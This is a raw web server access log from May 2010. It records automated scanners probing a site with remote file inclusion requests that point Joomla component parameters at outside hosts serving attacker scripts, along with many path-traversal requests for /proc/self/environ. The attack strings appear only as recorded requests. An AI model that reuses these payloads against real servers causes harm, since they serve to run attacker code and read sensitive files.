128.121.136.192 - - [19/May/2010:01:59:58 -0500] "GET /logs/access_log.1264982400//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.0" 404 300 "-""Mozilla/5.0"
128.121.136.192 - - [19/May/2010:01:59:59 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.0" 200 991 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:02:00:23 -0500] "GET /?view=page&pagename=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:02:00:23 -0500] "GET /logs/?view=page&pagename=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 200 6146 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:02:00:23 -0500] "GET /logs/access_log.1265241600/?view=page&pagename=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
128.121.136.192 - - [19/May/2010:02:00:29 -0500] "GET /logs/access_log.1265760000//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.0" 404 300 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:02:00:29 -0500] "GET /logs/access_log.1264982400//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:02:00:29 -0500] "GET /logs/access_log.1262649600//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:02:00:29 -0500] "GET /logs/access_log.1270944000//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
128.121.136.192 - - [19/May/2010:02:00:29 -0500] "GET //?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.0" 200 991 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:02:00:29 -0500] "GET /logs/access_log.1263340800//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
128.121.136.192 - - [19/May/2010:02:00:29 -0500] "GET /logs//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.0" 200 6132 "-""Mozilla/5.0"
216.129.119.43 - - [19/May/2010:02:00:30 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2227 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
128.121.136.192 - - [19/May/2010:02:00:49 -0500] "GET /logs/access_log.1264982400//?dir=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.0" 404 300 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:02:02:14 -0500] "GET /logs/access_log.1266537600//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:02:02:14 -0500] "GET /logs/access_log.1265155200//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:02:02:14 -0500] "GET /logs/access_log.1263168000//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
190.152.145.54 - - [19/May/2010:02:02:25 -0500] "GET /logs/access_log.1266451200//components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:02:06:03 -0500] "GET /logs/access_log.1270944000/?view=page&pagename=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
94.136.53.87 - - [19/May/2010:02:07:11 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.mocvh.co.uk/tmp/install_4a812a0961b9b/__MACOSX/dex/id1.txt?????????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
94.136.53.87 - - [19/May/2010:02:07:11 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.mocvh.co.uk/tmp/install_4a812a0961b9b/__MACOSX/dex/id1.txt?????????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
94.136.53.87 - - [19/May/2010:02:07:11 -0500] "GET /logs/access_log.1273363200%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.mocvh.co.uk/tmp/install_4a812a0961b9b/__MACOSX/dex/id1.txt?????????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
94.136.53.87 - - [19/May/2010:02:07:28 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.mocvh.co.uk/tmp/install_4a812a0961b9b/__MACOSX/dex/id1.txt?????????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
94.136.53.87 - - [19/May/2010:02:07:28 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.mocvh.co.uk/tmp/install_4a812a0961b9b/__MACOSX/dex/id1.txt?????????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
94.136.53.87 - - [19/May/2010:02:07:28 -0500] "GET /logs/access_log.1273363200%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.mocvh.co.uk/tmp/install_4a812a0961b9b/__MACOSX/dex/id1.txt?????????? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:02:12:31 -0500] "GET /logs/access_log.1214352000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.55 - - [19/May/2010:02:13:07 -0500] "GET /logs/access_log.1238630400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.236 - - [19/May/2010:02:15:05 -0500] "GET /logs/access_log.1193875200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.136.53.87 - - [19/May/2010:02:15:27 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
94.136.53.87 - - [19/May/2010:02:15:27 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
94.136.53.87 - - [19/May/2010:02:15:39 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
94.136.53.87 - - [19/May/2010:02:15:39 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
94.136.53.87 - - [19/May/2010:02:15:40 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
94.136.53.87 - - [19/May/2010:02:15:43 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
94.136.53.87 - - [19/May/2010:02:15:44 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
94.136.53.87 - - [19/May/2010:02:15:44 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
114.108.177.125 - - [19/May/2010:02:16:05 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.177.125 - - [19/May/2010:02:16:05 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.177.125 - - [19/May/2010:02:16:06 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.177.125 - - [19/May/2010:02:16:55 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.177.125 - - [19/May/2010:02:16:55 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.177.125 - - [19/May/2010:02:16:56 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.177.125 - - [19/May/2010:02:16:57 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.177.125 - - [19/May/2010:02:16:57 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.177.125 - - [19/May/2010:02:16:57 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.177.125 - - [19/May/2010:02:16:57 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.177.125 - - [19/May/2010:02:16:58 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.177.125 - - [19/May/2010:02:16:58 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.163.148.130 - - [19/May/2010:02:19:43 -0500] "GET /logs//infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 347 "-""libwww-perl/5.805"
89.163.148.130 - - [19/May/2010:02:19:44 -0500] "GET //infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 342 "-""libwww-perl/5.805"
89.163.148.130 - - [19/May/2010:02:21:45 -0500] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.163.148.130 - - [19/May/2010:02:21:45 -0500] "GET //index.php?option=com_projectfork§ion=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.142.187 - - [19/May/2010:02:24:40 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.142.187 - - [19/May/2010:02:24:40 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
178.32.3.34 - - [19/May/2010:02:24:43 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:02:24:43 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:02:24:44 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:24:48 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:24:48 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:24:49 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:24:50 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
94.23.9.198 - - [19/May/2010:02:24:51 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:02:24:51 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
74.54.63.138 - - [19/May/2010:02:24:55 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:02:24:55 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:02:24:55 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:02:24:58 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
216.14.124.80 - - [19/May/2010:02:24:58 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:02:25:05 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:02:25:11 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
121.190.102.21 - - [19/May/2010:02:27:04 -0500] "GET ///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:02:27:04 -0500] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:02:27:04 -0500] "GET /logs/access_log.1273363200%20%20///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
74.54.63.138 - - [19/May/2010:02:27:27 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:27:27 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:27:27 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:27:28 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:27:28 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:27:28 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:27:29 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:27:29 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:27:29 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:27:29 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:27:29 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:27:30 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:27:31 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:27:31 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:02:27:31 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:02:27:35 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:02:27:35 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:02:27:35 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:02:27:44 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:02:27:44 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:02:27:44 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:02:27:45 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:02:27:46 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:02:27:46 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
216.14.124.80 - - [19/May/2010:02:27:46 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
216.14.124.80 - - [19/May/2010:02:27:46 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
216.14.124.80 - - [19/May/2010:02:27:46 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
70.38.71.147 - - [19/May/2010:02:28:19 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:02:28:19 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:02:28:19 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
178.32.3.34 - - [19/May/2010:02:28:20 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:02:28:21 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:02:28:21 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:02:28:21 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:02:28:21 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:02:28:21 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
94.23.9.198 - - [19/May/2010:02:28:22 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:02:28:23 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
